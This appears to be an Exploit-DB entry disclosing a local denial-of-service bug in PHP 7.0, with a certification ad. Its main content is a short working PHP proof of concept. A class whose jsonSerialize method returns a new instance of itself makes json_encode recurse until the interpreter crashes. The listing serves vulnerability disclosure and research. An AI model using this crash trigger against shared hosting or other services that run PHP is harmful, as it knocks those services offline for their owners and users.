PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service

EDB-ID:

40329

CVE:

N/A


Type:

dos


Platform:

PHP

Date:

2016-08-31


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

<?php
#############################################################################
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class jsonTmp implements JsonSerializable {
	function jsonSerialize() {
		$jsonTmp = new jsonTmp();
		return $jsonTmp;
	}
}
json_encode(new jsonTmp());
?>